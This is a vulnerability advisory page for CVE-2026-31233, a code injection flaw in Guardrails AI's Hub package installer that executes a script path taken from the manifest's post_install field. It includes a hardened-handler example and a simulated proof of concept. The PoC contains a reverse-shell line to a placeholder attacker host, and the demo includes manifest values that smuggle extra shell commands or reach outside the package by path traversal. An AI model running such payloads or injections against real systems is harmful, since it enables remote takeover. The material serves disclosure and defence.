Security Vulnerability Report
CVE-2026-31233 CVSS 9.8 CRITICAL

CVE-2026-31233

Published: 2026-05-12 18:16:52
Last Modified: 2026-05-14 20:17:03

Description

Guardrails AI through 0.6.7 contains a code injection vulnerability (CWE-94) in its Hub package installation mechanism. When a validator package is installed with the "guardrails hub install" command, the installer retrieves a manifest from the Guardrails Hub and dynamically executes the script named in the manifest's post_install field. The script path is built from this untrusted manifest data and executed without validation or sanitization, which allows remote code execution. An attacker who can publish a package to the Hub can therefore run arbitrary code on any system where a victim installs that package.
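The pattern the description names, an installer that takes a script path from a downloaded manifest and hands it to a shell, is shown below next to a hardened handler. This is an added example written for this page, not code from the Guardrails AI project: the manifest layout, the function names and the use of /bin/sh as the interpreter are assumptions, and only the post_install field and the Hub install flow come from the advisory. The hardened handler rejects shell metacharacters, absolute paths and ".." traversal, confines the resolved path to the package directory (following symlinks), runs the script as an argv list rather than through a shell, and runs hooks only when the installer has explicitly opted in, because a well-formed path still points at content the package publisher controls.

```python
"""Added example for CVE-2026-31233 (not Guardrails AI project code).

Contrasts an installer that executes a manifest-supplied post_install value
through a shell with a hardened handler.  Manifest layout, function names and
the /bin/sh interpreter are assumptions; only the post_install field name and
the "guardrails hub install" flow come from the advisory.
"""
import subprocess
import tempfile
from pathlib import Path
from typing import Optional


class UnsafeManifest(ValueError):
    """Raised when a manifest's post_install value fails validation."""


def unsafe_run_post_install(package_dir: str, manifest: dict) -> str:
    """Vulnerable pattern: untrusted manifest text becomes part of a shell command line.
    Returns the command that would run; it is deliberately not executed here."""
    cmd = f"bash {package_dir}/{manifest['post_install']}"
    # os.system(cmd)  <- ';', '|', '$(...)' etc. in the manifest value run as code
    return cmd


def resolve_post_install(package_dir: str, manifest: dict) -> Optional[Path]:
    """Hardened resolution of the post_install path.

    Returns the validated absolute path, or None when the manifest declares no hook.
    Raises UnsafeManifest for anything that is not a plain file inside the package.
    """
    value = manifest.get("post_install")
    if value is None:
        return None
    if not isinstance(value, str) or not value:
        raise UnsafeManifest("post_install must be a non-empty string")
    if any(ch in value for ch in ";|&$`\n\r\x00"):
        raise UnsafeManifest("shell metacharacters are not allowed in post_install")
    rel = Path(value)
    if rel.is_absolute() or ".." in rel.parts:
        raise UnsafeManifest("post_install must be a relative path with no '..' components")
    root = Path(package_dir).resolve()
    script = (root / rel).resolve()  # resolve() follows symlinks, so a link out of the package is caught
    if root not in script.parents:
        raise UnsafeManifest("post_install resolves outside the package directory")
    if not script.is_file():
        raise UnsafeManifest("post_install is not a regular file")
    return script


def safe_run_post_install(package_dir: str, manifest: dict, allow_hooks: bool = False) -> Optional[int]:
    """Runs the validated hook without a shell, and only when the caller opted in.

    Even a well-formed path points at content the package author controls, so the
    installer, not the manifest, decides whether hooks run at all.  Returns the
    script's exit status, or None when nothing was run.
    """
    script = resolve_post_install(package_dir, manifest)
    if script is None or not allow_hooks:
        return None
    # argv list, no shell: the path is an argument, never parsed as a command line
    proc = subprocess.run(["/bin/sh", str(script)], cwd=package_dir, capture_output=True, text=True)
    return proc.returncode


def demo() -> dict:
    """Builds a constructed package directory and exercises both handlers."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp) / "fake-validator"
        pkg.mkdir()
        (pkg / "setup.sh").write_text("#!/bin/sh\nexit 7\n")  # constructed benign hook
        benign = {"package_name": "fake-validator", "post_install": "setup.sh"}
        # constructed malicious manifests an attacker-controlled Hub entry could carry
        hostile = {
            "injected": {"package_name": "fake-validator", "post_install": "setup.sh; id > /tmp/pwned"},
            "traversal": {"package_name": "fake-validator", "post_install": "../../../../etc/passwd"},
            "absolute": {"package_name": "fake-validator", "post_install": "/tmp/evil.sh"},
        }
        results["unsafe_cmd"] = unsafe_run_post_install(str(pkg), hostile["injected"])
        results["benign_skipped"] = safe_run_post_install(str(pkg), benign)  # hooks off by default
        results["benign_rc"] = safe_run_post_install(str(pkg), benign, allow_hooks=True)
        for name, manifest in hostile.items():
            try:
                resolve_post_install(str(pkg), manifest)
                results[name] = "accepted"
            except UnsafeManifest:
                results[name] = "rejected"
    return results


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val!r}")
```

Run it directly to see both outcomes on the constructed package. The unsafe handler only returns the command string it would have passed to a shell and never executes it; the hardened handler returns the benign hook's exit status when hooks are enabled and None otherwise, and refuses the three hostile manifests before anything is executed.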

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available for this entry; the affected range below is taken from the description.

Guardrails AI <= 0.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It only simulates the manifest and the installer's handling of it: nothing is fetched from the Hub, and the os.system() call that would execute the script is left commented out.
python
# Proof of Concept for CVE-2026-31233
# This script simulates a malicious package manifest creation.
import json
import os  # only used if the os.system() call below is uncommented

# 1. Define the malicious payload (e.g., reverse shell)
# In a real attack, this would be hosted on the attacker's server.
# (The content is never written to disk in this simulation.)
malicious_script_content = "#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# 2. Construct the malicious manifest
# The 'post_install' field points to the malicious script
malicious_manifest = {
    "package_name": "fake-validator",
    "version": "1.0.0",
    "post_install": "setup.sh",  # Vulnerability: Untrusted path executed
    "manifest_version": "1.0",
}

# 3. Simulate the vulnerable installation process
def vulnerable_install(manifest):
    print(f"[*] Installing {manifest['package_name']}...")
    script_path = manifest['post_install']
    # VULNERABLE CODE: Executing script path from untrusted source without validation
    print(f"[!] Executing post_install script: {script_path}")
    # os.system(script_path)  # This is where the RCE happens

if __name__ == "__main__":
    print("--- Malicious Manifest Generated ---")
    print(json.dumps(malicious_manifest, indent=2))
    print("\n--- Simulating Victim Installation ---")
    vulnerable_install(malicious_manifest)

References

https://github.com/guardrails-ai/guardrails
https://www.notion.so/CVE-2026-31233-35d1e13931888142a954fb3f50ee0c94

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-31233",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:16:51.627",
    "lastModified": "2026-05-14T20:17:02.600",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Guardrails AI thru 0.6.7 contains a code injection vulnerability (CWE-94) in its Hub package installation mechanism. When installing validator packages via guardrails hub install, the system retrieves a manifest from the Guardrails Hub and dynamically executes a script specified in the post_install field. The script path is constructed from untrusted manifest data and executed without proper validation or sanitization, allowing remote code execution. An attacker who can publish malicious packages to the Hub can inject arbitrary code that will be executed on any system where a victim installs the malicious package."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/guardrails-ai/guardrails",
        "source": "[email protected]"
      },
      {
        "url": "https://www.notion.so/CVE-2026-31233-35d1e13931888142a954fb3f50ee0c94",
        "source": "[email protected]"
      }
    ]
  }
}